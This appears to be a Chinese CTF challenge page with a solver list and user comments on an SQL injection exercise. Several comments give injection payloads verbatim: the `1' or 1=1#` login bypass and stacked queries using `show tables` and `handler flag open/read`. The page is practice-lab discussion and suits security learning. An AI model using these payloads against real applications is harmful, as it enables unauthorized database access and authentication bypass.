评分(13)
解题动态
ggsea 攻破了该题 4小时前
风雨无阻1 攻破了该题 7小时前
凯哥 攻破了该题 7小时前
suyifeim4 攻破了该题 9小时前
6ufui 攻破了该题 22小时前
15940386099 攻破了该题 1天前
willow 攻破了该题 1天前
LM357 攻破了该题 1天前
SHW 攻破了该题 1天前
耶时候搜索 攻破了该题 1天前
tabwux 攻破了该题 1天前
zhuge2003 攻破了该题 2天前
秋叶沙沙 攻破了该题 3天前
小白d 攻破了该题 3天前
xyqt 攻破了该题 3天前
bisheng 攻破了该题 5天前
Vluae 攻破了该题 5天前
cyberneko 攻破了该题 6天前
dawndawnz 攻破了该题 7天前
评论
乔qiao 1月前
举报
逗我呢 万能密码直接出?我还一个一个注入无敌了,坑我五个币
lover 1月前
举报
1' or 1=1#
我的刀盾 1月前
举报
研究了一下,本题有万能钥匙确实意外之喜,用fuzz测试可以看过滤的函数或字符,可以用布尔盲注,burp进行爆破。看评论还有堆叠注入。
bugkuaccount3214 3月前
举报
非预期解啊同志,我测是否有注入直接把真假flag一块爆出来了……
极品老学生 4月前
举报
关于万能密码《1' or 1=1#》的故事
shrinp 7月前
举报
(1)万能密码的使用-》 1' or 1=1;#-- (2)堆叠注入的使用-》 1';show tables;show columns from flag; handler flag open;handler flag read first;handler flag read next;
奔跑的开开 10月前
举报
1' or 1=1#
一个姓⎝李⎠的师傅~ 1年前
举报
2 个小时,从试错 sqlmap 原理到万能密码以及原理! 最重要的是手动注入,绕过,堆叠查询,以及表名 flag 到底怎么知道的! 一篇文章全给你讲明白: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#k12At
wywsssf 1年前
举报
万能钥匙应该是意外,这个才是本意吧 ?id=1';handler flag open as a;handler a read next;handler a read next;handler a read next;handler a read next;handler a read next;handler a read next;handler a read next;
聪10011 1年前
举报
直接报错注入,发现不行后一步一步试探,先加单引号和注释符#,后加万能密码or 1=1 # 直接过了